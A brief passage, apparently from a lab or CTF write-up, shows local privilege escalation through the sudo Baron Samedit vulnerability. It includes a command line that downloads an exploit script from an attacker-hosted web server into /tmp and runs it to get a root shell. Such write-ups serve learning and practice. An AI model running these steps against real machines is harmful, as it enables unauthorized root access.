Other way using

Steps to replicate:

# Check for the version of sudo installed.
sudo -V

In my case, I found the version to be 1.8.29.

While reviewing potential exploits, I discovered something related to the Sudo Baron Samedit vulnerability.

The linpeas.sh script also suggests this exploit. I plan to try the following Python script to determine if it can provide shell access.

Start web server and send the file to the victim machine.

python3 -m http.server 80

cd /tmp && wget http://192.168.45.220/exploit_nss.py && python3 exploit_nss.py

Got the shell as root.

Last updated 1 year ago

Was this helpful?